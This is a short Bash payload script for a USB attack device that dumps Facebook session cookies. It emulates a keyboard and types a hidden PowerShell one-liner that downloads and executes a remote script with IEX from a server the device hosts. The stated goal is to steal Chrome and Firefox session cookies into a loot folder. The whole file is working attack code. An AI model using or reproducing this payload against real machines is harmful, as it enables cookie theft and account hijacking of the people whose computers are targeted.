#!/bin/bash
#
# Title:         Facebook session cookies dump
# Author:        oXis (inspired by illwill)
# Version:       2.1
#
# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
# Credit to illwill for the BrowerCreds payload
#
# LED States 
# Setup.............Setup
# Yellow............Setup RNDIS_ETHERNET
# Green.............Got Browser Creds

LED SETUP
LOOTDIR=/root/udisk/loot/FacebookSession
mkdir -p $LOOTDIR

ATTACKMODE HID
LED STAGE1
GET SWITCH_POSITION
cd /root/udisk/payloads/$SWITCH_POSITION/
# server.py can now instant bind sockets 
iptables -A OUTPUT -p udp --dport 53 -j DROP
./server.py &

#Dump Chrome Cookies
RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"

LED STAGE2
ATTACKMODE RNDIS_ETHERNET

LED FINISH